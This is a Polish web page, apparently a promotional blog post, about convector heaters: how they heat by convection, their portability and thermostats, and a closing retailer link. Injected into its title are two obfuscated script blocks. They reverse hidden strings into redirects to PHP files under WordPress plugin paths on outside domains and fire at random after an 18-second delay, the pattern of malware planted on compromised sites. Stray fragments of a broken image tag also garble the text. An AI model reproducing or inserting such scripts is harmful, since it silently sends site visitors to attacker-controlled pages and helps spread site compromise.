You are currently viewing Profesjonalne grzejniki konwek<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>torowe

Profesjonalne grzejniki konwektorowe

 

Jesień i zima są szczególnie wymagającymi porami roku, kiedy najbardziej liczy się ciepło. Nasze domu i mieszkania możemy ogrzewać na wiele sposobów, które mogą się od siebie znacznie różnić nie tylko źródłem ciepła, ale i kosztem.

Czy grzejnik konwektorowy jest wydajny?

torowe” width=”83″ height=”125″ />W dużych miastach wiele lokali jest podłączonych pod centralne ogrzewanie, które jest najmniej problematyczne. Spotykane są jeszcze piece węglowe, które zostały przerobione na elektryczne. Dość dużą popularnością cieszą się grzejniki konwektorowe, które mogą stanowić podstawowe źródło ogrzewania, a także dodatkowe. Przede wszystkim są łatwe w montażu, użytkowaniu i często także oszczędne. Tego typu grzejniki przekazują powietrze poprzez tak zwaną konwekcję, czyli zasysanie zimnego powietrza, ogrzewanie go, a następnie wydawanie ciepłego. Konwektorowe modele nie są ciężkie i najczęściej budowane są z metalu i plastiku, dzięki czemu można je łatwo przenosić w dowolne miejsce. Mają praktyczne nóżki, przez co stabilnie stoi na na każdym równym podłożu. Dużą zaletą grzejników konwektorowych jest szybkość działania, co sprawia, że są one często wybierane przez klientów. W krótkim czasie można nagrzać pomieszczenie o określonej wielkości. Dodatkowo grzejniki jest wyposażony w termostat, który zabezpiecza urządzenie przed przegrzanie. Jeżeli chodzi o jego użytkowanie, to można go nastawić na tryb zmienny, gdzie grzejnik sam włącza i wyłącza się po osiągnięciu odpowiedniej temperatury. Na pewni grzejniki tego typu świetnie się sprawdzą w małych pomieszczeniach.

W zależności od wielkości i mocy grzejnika, możemy go dostosować do metrażu pomieszczenia. W sezonie zimowym są niezastąpione w nieszczelnych mieszkaniach lub tam, gdzie tradycyjne ogrzewanie nie wystarcza i trzeba je dogrzać.

Grzejniki konwektorowe znaleźć można na: https://www.jaga.com.pl/